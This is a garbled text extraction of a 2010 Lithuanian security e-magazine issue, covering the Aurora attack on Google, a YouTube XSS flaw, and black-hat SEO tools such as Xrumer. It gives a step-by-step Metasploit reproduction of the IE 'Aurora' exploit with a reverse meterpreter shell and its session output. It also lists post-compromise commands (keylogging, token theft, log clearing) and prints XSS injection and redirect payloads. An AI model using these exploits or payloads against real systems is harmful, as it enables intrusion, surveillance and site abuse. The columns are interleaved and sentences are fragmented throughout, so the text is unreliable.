nei 20 kompanijų nukentėjo nuo šių atakų. Kiti

labai

koordinuoti. Kol didžiųjų kompanijų darbuotojai

šaltiniai teigia, kad nuo šių atakų nukentėjo daugiau nei 34 organizacijos.


Teksaso ir Taivano valstybėse esančių serverių.

Atakos analizė

Tuomet

užkrėsta

mašina

pradeda

tyrinėti

Google teigia, kad šios atakos metu buvo pavogta

apsaugota bendrovės intranetą ieškodami kitų

jos

pažeidžiamų

inteleaktualinė

nuosavybė.

Kibernetiniai

sistemų

bei

intelektualinės

nusikaltėliai labiau domėjosi prieigos gavimu prie

nuosavybės. Kibernetiniai nusikaltėliai šią ataka

Gmail vartotojų paskyrų, kurios priklausė Kinijos

nutraukė Sausio 4 dieną, po to kai Ilinojaus,

disidentams. Pagal Financial Times, dvi Ai

Teksaso ir Taivano serveriai buvo išjungti. Nėra

Weiwei Gmail paskyros buvo nulaužtos, jų turinys

žinoma ar šiuos serverius išjungė kibernetiniai

perskaitytas ir nukopijuotas. Tačiau, kibernetiniai

nusikaltėliai ar serverių administratoriai. Tačiau ši

nusikaltėliai peržiūrėjo tik dviejų Gmail paskirų

ataka buvo atnaujinta 2010m. vasario mėnesį.

duomenis – laiškų temas ir Gmail paskyrų

Pažeidžiamumo panaudojimas

sukūrimo datas. McAfee saugumo ekspertai ištyrė,

Pabandykime pakartoti visą atakos eigą naudodami

kad ši ataka buvo įvykdyta per iki šiol nežinoma

metasploit`ą. Tiesa, šiek tiek baugu bus skaityti

Internet Explorer 6 naršyklės pažeidžiamumą.

kaip pažeidžiamumas dirba ir kaip lengvai

Pažeidžiamumas paveikia Windows 2k, XP, 2003,

kibernetinis

2008, Vista ir Se7en operacines sistemas. Praėjus

pažeidžiamą sistemą.

nusikaltėlis

gali

kontroliuoti

savaitei po McAfee paskelbto pranešimo apie šį pažeidžiamumą Microsoft kompanija pripažino,

Naudojama programinė įranga:

kad apie šį pažeidžiamumą jau žinojo nuo 2009m.

Metasploit Framework;

rugsėjo mėnesio... Tad klausimas, kodėl Microsoft

2 tinklo VMware, Win XP SP2 atvaizdai

neužkamšė šio pažeidžiamumo ? Kai sistema užkrečiama „Aurora“ atakos metu

(image); 

TCPView.

paskleistu virusu, tuomet sukuriamas atgalinių

Įdiegiame metasploit į vieną iš VMware

durų ryšys (backdoor). Šiuo ryšiu susijungiama

atvaizdų, kuris yra kaip hakerio kontroliuojama

tarp aukos kompiuterio ir Ilinojaus,

sistema, įdiegimas atliekamas šiomis komandomis:

msf > use

exploit/windows/browser/ie_“Aurora“msf exploit(ie_“Aurora“) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD =>

windows/meterpreter/reverse_tcpmsf exploit(ie_“Aurora“) > set LHOST 192.168.1.30

LHOST => 192.168.1.30msf exploit(ie_“Aurora“) > set LPORT 6666 LPORT => 6666msf exploit(ie_“Aurora“) > set URIPATH /

URIPATH => /msf exploit(ie_“Aurora“) > Exploit


Atsakas, kuris parodo, kad serveris yra startavęs: [*] Exploit running as background job.msf

[*] Started reverse handler on port 6666[*]

exploit(ie_“Aurora“) >

Using URL: http://0.0.0.0:8080/

[*] Local IP: http://192.168.1.30:8080/ [*] Server started.

Kai pažeidžiamojoje sistemoje atidaroma Internet Explorer interneto naršyklė ir įvedamas

IP adresas (mūsų atveju 192.168.1.30), tuomet gaunamas atsakas:

serverio

[*] Sending Microsoft Internet Explorer "„Aurora“" Memory Corruption to client 192.168.1.57[*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (192.168.1.30:6666 -> 192.168.1.57:1038) sessions -i 1[*] Starting interaction with 1... –

komanda, kurios pagalba susijungiama su pažeista sistema.

Testuojant pažeistą sistemą

Paveiksle

matome

atvira

Internet

Explorer

naršyklės prievadą, kuriuo naudojasi „Auroros“

Jei pažeistoje sistemoje būtų tikrinami atviri

atakos metu įveistas atgalinių durų virusas. Nėra

prievadai, būtų rasta išties įdomių dalykų. T. y.

kito būdo kaip atpažinti ar sistema nulaužta ir

būtų atrastas prievadas, kurį atidarė atgalinių durų

kontroliuojama iš nuotolinio serverio.

virusas.


Kontroliuojant pažeistą sistemą

Komandos, kuriomis galima kontroliuoti pažeistą

Stdapi: vartotojo sąsajos komandos:

sistemą:

Enumdesktops

? -

Help menu

background channel -

window stations Backgrounds the current session

Displays information about active

channels close -

Idletime

- Returns the number of seconds the

remote user has been idle keyscan_dump

Closes a channel Terminate the meterpreter session

keyscan_stop

help -

Help menu

setdesktop

interact -

Interacts with a channel

Drop into irb scripting mode

migrate -

Migrate the server to another process

- Dump they keystroke buffer - Start capturing keystrokes

keyscan_start

exit -

irb -

- List all accessible desktops and

- Stop capturing keystrokes

- Move to a different workstation and

desktop - Control some of the user interface components uictl

quit -

Terminate the meterpreter session

Stdapi: Failų sistemos komandos:

read -

Reads data from a channel

cat - Read the contents of a file to the screen

run -

Executes a meterpreter script

cd - Change directory

use -

Load a one or more meterpreter extensions

del - Delete the specified file

write -

Writes data to a channel

download - Download a file or directory edit - Edit a file

Stdapi tinklo komandos: ipconfig portfwd -

service

Display interfaces Forward a local port to a remote

getlwd - Print local working directory getwd - Print working directory lcd - Change local working directory route - View and modify the routing tablo ls - List files


mkdir - Make directory

reboot -

pwd - Print working directory

reg -

rm - Delete the specified file

registry

rmdir - Remove directory

rev2self -

upload - Upload a file or directory

machine

Modify and interact with the remote

shell -

Stdapi: sistemos komandos: Clear the event log

clearev -

drop_token -

Relinquishes any active

impersonation token. Execute a command

execute getpid -

getuid kill -

Get as many privileges as possible

Get the user that the server is running

ps -

List running processes

Shuts down the remote computer

steal_token -

Attempts to steal an

impersonation token from the target process sysinfo -

Gets information about the remote

system. Aukščiau pateikiau komandas, kurios gali būti naudojamos norint kontroliuoti pažeistą sistemą. Pasaulis pasikeitė. Kiekvieną modelį dabar

Terminate a process

lpwd - Print local working directory

Calls RevertToSelf() on the remote

Drop into a system command shell

shutdown -

Get the current process identifier

getprivs -

Reboots the remote computer

reikia

adaptuoti

Administratoriai intelektualinės

prie turi

naujos

rūpintis

nuosavybės

visos

apsauga,

nefinansinių klientų informaciją.

realybės. įmonės privačių,


Liepos mėnesio pradžioje youtube.com tipo

Kad būtų galima į komentarų skiltį įterpti HTML

pažeidžiamumas. Išnaudojus šį pažeidžiamumą į

kalbą pirmiausia reikia „aktyvuoti“ HTML kalbą.

youtube.com tinklalapio komentarus galima įterpti

Tai atliekama komanda: <script>

tinklalapyje

buvo

atrastas

XSS

Panagrinėkime šį pažeidžiamumą iš arčiau.

žalingą HTML kodą.

Pavyzdžiui:

<script><h1> aplankykite isauga.com – Šviesesnio rytojaus link <blink> <marquee>

<br> <br> Alone ’);”; </script>

Iššokantis (pop-up) reklaminis langas,

pasinaudojus paprasta JavaScript kalbos komanda:

įterpiamas

<script><BODY onLoad=”alert(‘aplankykite isauga.com - Alone’);”

jei norima nukreipti į kitą tinklalapį: <script>Zbody onLoad=”document.write(‘<script>window.location = String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 105, 115, 61, 165, 67, 61, 46, 63, 6f, 6d );</script>’);”;

Įterpus šį kodą į youtube.com tinklalapį, jis persiųs jus į www.isauga.com tinklalapį


Pradedame nuo pat pradžių. Kas yra SEO ?

dažniausiai

yra

naudojami

interneto

sukčių,

Su kuo jis valgomas ir apskritai apie ką aš kalbėsiu

kibernetinių nusikaltėlių bei kitų piktavalių.

?

šiomis

SEO faktorių, lemiančių tinklalapio pozicijas

technologijomis pateikiu šiek tiek sausos teorijos

paieškos sistemose, 2009 metais buvo daugiau

kurią galite rasti paprasčiausioje Wikipedijoje. O

kaip 200.

Supažindinant

skaitytojus

su

tie, kurie žino, kas yra SEO ir kuo skiriasi whitehat SEO nuo black-hat SEO siūlyčiau praleisti šio

Sistemų algoritmai nėra viešinami, siekiant išvengti manipuliavimo jais. Išskiriamos dvi SEO dalys - vidinis SEO bei

straipsnio dalį ir skaityti toliau. Optimizavimas paieškos sistemoms (angl.

išorinis SEO. Vidinio SEO metu svetainėje

Search Engine Optimization, trump. SEO) -

atliekami techniniai tinklapio optimizavimo darbai,

Interneto tinklapių projektavimo metodologija,

todėl paieškos sistemos lengviau analizuoja ir

siekiant aukščiausių tinklalapio pozicijų paieškos

suvokia svetainėje esantį turinį.

sistemų rezultatuose. Dažnu atveju SEO yra

Išorinio SEO metu dažniausia stengiamasi į

klaidingai tapatinamas su marketingu paieškos

svetainę pritraukti kuo daugiau nuorodų pagal tam

sistemose (angl. Search Engine Marketing, trump.

tikrus kriterijus. (straipsnis iš Wikipedijos: Aut.

SEM). Populiariausias ir daugeliui žinomas SEM

Pstb.) .

įrankis yra Google "AdWords". SEO skirstomas į du

tipus:

leidžiamas

paieškos

sistemų

bei

draudžiamas (angl. white-hat SEO bei black-hat

Išsamiai apie Black Hat SEO Black Hat paieškos sistemų optimizavimas

SEO).

paprastai apibrėžiamas nelegaliais metodais, kurie

Naudojant nelegalius tinklalapio optimizavimo

naudojami

paieškos sistemoms būdus, svetainė anksčiau ar

tinklalapio aukštesnio lygio reitingą. Naudojant šį

vėliau bus pašalinta iš paieškos sistemų rezultatų

metodą dažniausia apimamos šios technikos:

puslapių (angl. Search Engine Result Page, trump. SERP). Blackhat metodai

norint

paieškos

sistemoje

gauti

 Laužomos paieškos sistemų taisyklės bei reglamentai;


 Neetiškai pateikiamas tinklalapio turinys.

tuomet iš paieškos sistemų robotų galite susilaukti

Dažniausiai vizualiu (matomu) ar nevizualiu

griežtos bausmės. O jie, patikėkite, tikrai nesigaili.

(nematomu) metodu tiek paieškos vorams,

Paslėptas turinys Viena iš labiausiai naudojamų black Hat

tiek paieškos sistemų naudotojams. Naudojantis Black Hat SEO galite gauti

SEO technikų yra turinio slėpimas. Paslėptas

nebent tik trumpalaikės naudos, tačiau jei jūs šia

tinklalapio turinys būna įvairias pavidalais, tačiau

technika naudositės savo tinklalapyje ir platinsite

pats pagrindinis

šlamštą,

<noscript>

Imaginary Car Hire Firm do Car Hire which is very affordable so if you want to hire a car call our car hire firm because we are the best car hire firm in the world </noscript>

principas yra tai, kad per paslėptą turinį

Paslėpti

turinį

galima

naudojant

svetainėje prikišama įvairiausių žodžių, kurių

komentavimo tagus (gaires). Komentavimo tagai

vartotojai nemato, tačiau suindeksuoja paieškos

atrodo maždaug taip:

sistemų robotukai.

<!-- komentavimo tegas -->

, arba // komentavimo tegas .

Jei norima paimti ne vieną eilutę: /*

komentavimo tegas

komentavimo tegas komentavimo tegas

*/

Realiai, komentavimo tagai yra skirti

Kitas populiarus būdas paslėpti tam tikrą turinį tai

programuotojams pažymėti tam tikrą kodo dalį.

naudoti <noscript> tagą. Iš tiesų šis tagas tūrėtų

Teisingai naudojami komentavimo tagai: <!–

būti naudojamas norint informuoti vartotojus, kad

Pagrindinio

O taip

tam tikras scenarijus (skriptas) yra naudojamas,

komentavimo tagai naudojami nekorektiškai: <!—

bet jų interneto naršyklė nepalaiko šio scenarijaus.

Search

turinio

engine

professional

search

pradžia

–>.

optimisation, engine

SEO,

optimisation

company, spamming search enginės, Viagra, porn, shop –>

Kad

padidintų

svetainės

lankomumą

bei

populiarumą kibernetiniai nusikaltėliai šį tagą naudoja kaip viena iš šlamšto technikų,.


Teisingai naudojamo <noscript> tago pavyzdys: <script type=”text/javascript”> <!– document.write(“Hello World!”) //–> </script>

<noscript>Jūsų interneto naršyklė nepalaiko JavaScript!</noscript>

Neteisingai naudojamo <noscipt> pavyzdys: <noscript>

Imaginary Car Hire Firm do Car Hire which is very affordable so if you want to hire a car call our car hire firm because we are the best car hire firm in the world </noscript>

Taip pat gali būti naudojami kiti HTML kalbos

Jei netyčia, ar to nežinant naudojatės tokiomis

tagai: <input type=”hidden”> , <noframes>

technikomis siūlyčiau kuo greičiau jų atsisakyti,

Neverta apsiriboti vien tik HTML kalba, dar galima naudoti ir CSS - pakopinio stiliaus kalbos tagus. Slepiamas tekstas, kuris turi lygiai tokia pačia spalvą kaip ir tinklalapio fonas, arba

nes jūsų tinklalapis gali būti užblokuojamas paieškos sistemų. Meta raktažodžiai

naudojamos labai mažos raidės, kurių naudotojas

Meta dalies raktažodžiai (keywords) tūrėtų

nepamato. Pavyzdžiui, raudonu šriftu užrašytas

būti trumpas žodžių sąrašas, kuris tūrėtų atspindėti

tekstas nėra matomas raudoname tinklalapio fone,

tinklalapio temą. Turėtumėte nepiktnaudžiauti

arba naudojamos vos 1 mm. Raidės kurių

meta raktažodžiais, nes paieškos sistemos jau

naudotojas paprastai neįžiūri, tačiau tiek parašytas

„išmoko“ patikrinti juos.

tekstas turintis tą pačia spalvą, tiek labai mažas tekstas

yra

naudojamas

tinklalapyje

ir

suindeksuojamas paieškos robotų.

Taisyklingai naudojami raktažodžiai: <meta name=”Keywords” content=”Online marketing, digital marketing, search marketing, search engine marketing, e-mail marketing, SEO” />

Netaisyklingai naudojami raktažodžiai: <meta name=”keywords” content=” Restaurant, restaurants, food, feed, take away food, fast food,junk food, eat, eating out, dinner, dining, meal, eating, MadeUp, steak and chips,

chicken and chips, pie and chips, pudding, desert, big restaurant,small restaurant, best restaurant, great restaurant, exclusive restaurant, cocktails, wine,drink, pizza, sandwhiches ”>


Ir kai netinkamai būna aprašyti raktažodžiai,

Meta raktažodžių užkimšimas

paieškos

robotukai

perspėja

savo

paieškos

Pagrinde yra du meta tagai, kuriais

sistemas, kad tas tinklalapis naudoja neleistina

naudojamasi informuoti paieškos sistemas, koks

SEO techniką. Meta taguose tūrėtų būti aprašyta

tinklalapio turinys pateikiamas. Šie tagai yra tarp

tai, kas pateikiama tinklalapio turinyje, ne daugiau

tinklalapio <head></head> dalių.

nei 1 ar 2 sakiniai. Taisyklingas meta aprašymas:

<meta name=”description” content=”PushON are an Online Marketing agency providing a full range of digital marketing services throughout Greater Manchester and the North West UK. If you need Search Engine

marketing (SEM), Search Engine Optimisation (SEO) or Pay per Click (PPC), we can help you. Contact us now.” />

Netaisyklingas meta aprašymas: <meta name=”description” content=”MadeUp restaurant website is the best MadeUp restaurant website,

our

restaurant

is

better

restaurant,visit our restaurant” />

than

any

restaurant,great

restaurant,best

food

papildomo srauto. Talpindami nuorodas tokiuose

Įšėjimo bei atėjimo puslapiai

tinklalapiuose rizikuojate, kad jūsų tinklalapis gali

Tokio tipo puslapiai dažniausiai yra sukurti tik

būti išmestas iš paieškos sistemų. Neretai, SEO

paieškos sistemoms, ne tinklalapio skaitytojams. Iš

optimizavimu užsiimančios įmonės, kurios nežino

tiesų tai netikri, suklastoti puslapiai, kuriuose

apie

prikemšama ir naudojama aukšto reitingo vienas

optimizacijos programas, kurios skatina tokių

ar du raktažodžiai kurie atveda į šį tinklalapį.

puslapių kūrimą. Paieškos vorai jau sugeba

Tinklalapio lankytojai niekada nepamatys šio

atpažinti tokius tinklalapio puslapius ir geba juos

puslapio, nes naudotojas užėjęs į šį tinklalapio

ignoruoti, arba dar blogiau, gali jūsų tinklalapį

puslapį

pažymėti netinkamu ir užblokuoti jį paieškos

automatiškai

persiunčiamas

į

kitą

tinklalapį, be galimybės jį pamatyti. Nuorodų fermos Nuorodų fermos tai visiems prieinami, nemokami tinklalapiai (Free For All [FFA]), kurie neturi pagrindinio tikslo, kaip tik teikti nuorodas į kitus tinklalapius. Jie nesuteikia jums kažkokio

sistemoms.

kalba,

naudoja

specialias

SEO


Įrankiai

Šis

Daugelis, užsiimančių Black Hat SEO technikomis stengiasi nesitepti rankų ir visą darbą paversti į automatizuotą sistemą, būtent tam ir yra naudojamos specialios programos, kurios už juos atlieka visus darbus. Viena iš tokių programų tai Xrumer.

Šios

programos

dėka

forumų,

tinklaraščių, ir svečių knygų į savo tinklalapį galite gauti tūkstančius atgalinių nuorodų. Šių nuorodų dėka tinklalapio puslapiavimo reitingas ženkliai šokteli aukštyn. Xrumer programa geba išplatinti norimą tinklalapį per 100.000 forumų, tinklaraščių ar svečių knygų, kiekvienoje iš jų palikdamas po nuorodą . Trumpas apibrėžimas – Xrumer tai profesionali, aukštos kokybės programa, kuri geba automatiškai sudaryti nuorodas. Vos per kelias dienas norimas tinklalapis šoktels Google reitinguose į topus.

įrankis

mėgstamas

tiek

naujokų,

tiek

profesionalų todėl, kad Xrumer yra labai galinga bei efektyvi programa. Tačiau čia pasakos ir pasibaigia, nes programa kainuoja 540$. Žinoma juodųjų skrybelių hakeriai ją, įvairiuose P2P tipo tinkluose,

randa

„nulaužtą“,

tačiau

neverta

susigundyti lengvu grobiu, nes 90% P2P tinkluose esančių programų kurių pavadinimai - Xrumer yra ne kas kita kaip Trojos arkliai bei kiti virusai (išbandyta!). Ką siūlo programa: 

Šimtu tūkstančių nuorodų į tinklalapį.;

Automatizuotą SEO darbą.;

Greita pakilimą paieškos sistemose;

Aukštą tinklalapio reitingavimą.


Delete

Dar daugiau, ji turi begalę kitų nustatymų: Links

counter

Pasirinkus

norimą

duomenų bazę iš Links aplankalo, gali suskaičiuoti

pavadinimas

duplicated pasako.

links

Ištrina

Jau

pats

pasikartojančias

nuorodas esančia duomenų bazėje. Links database analysis – Tai labai

kiek nuorodų yra faile / duomenų bazėje. Links post-processing. Geba sutvarkyti nuorodas

galingas ir naudingas įrankis. Jis tikrina žinutes,

esančias duomenų bazėje. T. y iš

kurias pavyko įterpti į forumus, ir stebi kiek šių

http://link.com/index.php? Paverčia į

žinučių ištrynė forumų moderatoriai.

http://link.com/index.php .

Graphics reports – Šis įrankis leidžia grafiškai

apeiti grafines captcha apsaugas. Numatyta

atvaizduoti forumuose, tinklaraščiuose, svečių

galimybė tik užsiregistruoti forumuose ir nesiųsti

knygose sėkmingai patalpintas žinutes.

jokių

reklaminių

žinučių

arba

atvirkščiai,

Taip pat geba procentaliai atvaizduoti tas

užsiregistruoti ir patalpinti žinutes, netgi galimybė

žinutes, kurios dar laukia patvirtinimo bei domenų

forumuose užsidėti savo norimą avatarą  nors ne

zonas, forumų naudojamas sistemas bei svečių

itin naudinga savybė, tačiau vis tiek įdomu kad

knygas. Ataskaitos pateikiamos grafiniu arba

tokia savybė teikiama.

diagramų būdu.

Kita, ne mažiau menkesnė, o gal net

Be visų aukščiau išvardintų savybių, taip pat

geresnė programa tai - SEO Power Suite. Tiksliau

galima programą susikonfigūruoti taip, kad ji

tai

siųstų reklamines žinutes per proxy prievadus,

paprogramų:

programa

susidedantį

keturių

kitų


LinkAssistant;

Rank Tracker;

SEO SpyGlass;

WebSite Auditor.

SEO Power Suite

turi

LinkAssistant geba atrasti aukšto reitingavimo tinklalapius panašius į jūsų, ir juose iškapstyti susisiekimo

tiek mokamą, tiek

versijoje

apkarpytos

kai

kurios funkcijos, kurios jums neleis sklandžiai dirbti, tačiau nereikia norėti, kad viskas būtų pateikiama ant lėkštutės. Apie kiekvieną paprogramę konkrečiai. LinkAssistant – Tai labai įdomus įrankis, kuris

pagal

norimą

t.

y.

elektroninį

paštą.

Galimybė pačiam sugeneruoti nuorodų direktorijų

nemokamą versija. Nemokamoje

detales

užklausą

geba

kategorijas bei subkategorijas, bei jas įkelti į tinklalapį. Įdomiausia yra tai, kad susisiekti su kito tinklalapio savininku galima tiesiai iš programos, nes ji turi ne tik elektroninio pašto dėžutę, bet ir interneto

naršyklę...

LinkAssistant

programa

suteikia galimybę stebėti nuorodų populiarumą. Tiesa sakant, naudodamas šia programa užmiršau apie kitus FTP klientus.

atrasti

tinklalapio partnerius ir pateikti partnerių kontaktų detales.

Rank Tracker – Tai programa kuri gali būti labai

Rank Tracker turi papildomą įskiepį (komponentą)

naudinga,

tikrinti

kuris padeda „pasiūlyti“ geresnius raktažodžius.

tinklalapio reitingavimą bei stebėti tinklalapio

Tiesa sakant ,šioje paprogramoje yra net 11

poziciją paieškos sistemoje,

skirtingų raktažodžių, siūlymo įrankių. Rank

jei

norite

automatiškai


Tracker Palaiko 663 paieškos sistemas. Dar

T. y. programa paima raktažodžius su kuriais

daugiau, programa suteikia galimybę stebėti

daugiausiai ieškoma paieškos sistemose ir pagal

norimo

jūsų

parodyti

tinklalapio geriausius

reitingavimą. raktažodžius,

Galimybė kurie

tinklalapio

esmę

pasiūlo

geresnius

raktažodžius

optimizuotų tinklalapį.

SEO Spy Glass – Tai programa, kuri gali šnipinėti

Geba atspausdinti atgalinių nuorodų sąrašą bei gali

tinklalapio atgalines nuorodas, bei gauti detalesne

išsiųsti elektroniniu paštu ar publikuoti internete.

informacija apie paliktas nuorodas. Šis įrankis

Tai labai naudingas įrankis stebėti atgalinių

geba išanalizuoti nuorodas 428 vietinėse ir

nuorodų ryšiams bei nustatyti kurie tinklalapiai

pasaulinėse paieškos sistemose.

gerai reitinguojami, o kuris ne taip gerai.


Paskutinę ir tikrai neprasčiausia programa tai WebSite Auditor.Šios programos dėka galima

WebSite Auditor

gali padėti atrasti bei

pataisyti:

lengvai optimizuoti viso tinklalapio turinį ir jį

Neveiksmingas nuorodas;

„patraukliai“ pritaikyti paieškos sistemoms. Tai

HTML kodo klaidas;

vienintelė programa kuri leidžia optimizuoti

Dubliuotą turinį;

tinklalapį dviem lygiais – pačio tinklalapio

404 ir kitų serverių atsako klaidas;

(domeno) ir puslapių (turinio). Optimizuojant šiais

Ne indeksuotus tinklalapio

dviem metodais norimas tinklalapis greitai atsidurs

puslapius;

paieškos

sistemos

pirmuosiuose

puslapiuose.

Konkrečiau kalbant, atsižvelgiant į įvairius SEO faktorius išanalizuoti

šis

įrankis

visą

surinktus duomenis.

geba

viename

lange

tinklalapį,

pateikiant

visus

Prarastus ar per ilgus meta

aprašymus; Bei kitus faktorius kurie gali įtakoti tinklalapio reitingavimą.


Šiam kartui tiek. Pageidavimus, pastabas, siūlymus galite siųsti nurodytu el. paštu. Dėl reklamos visi klausimai derinami el. paštu arba skype programa.

KITO NUMERIO TEMOS 

20 Windows slaptų triukų, kurių neperskaitysite niekur kitur;

Ar Google XXI amžiaus priešas ?

Laužimai pasitelkiant Google sistemą, ką Googlegali išduoti apie jus ?

isuaga el. žurnalas  

isauga 2010-09 el. žurnalas

Read more
Read more
Similar to
Popular now
Just for you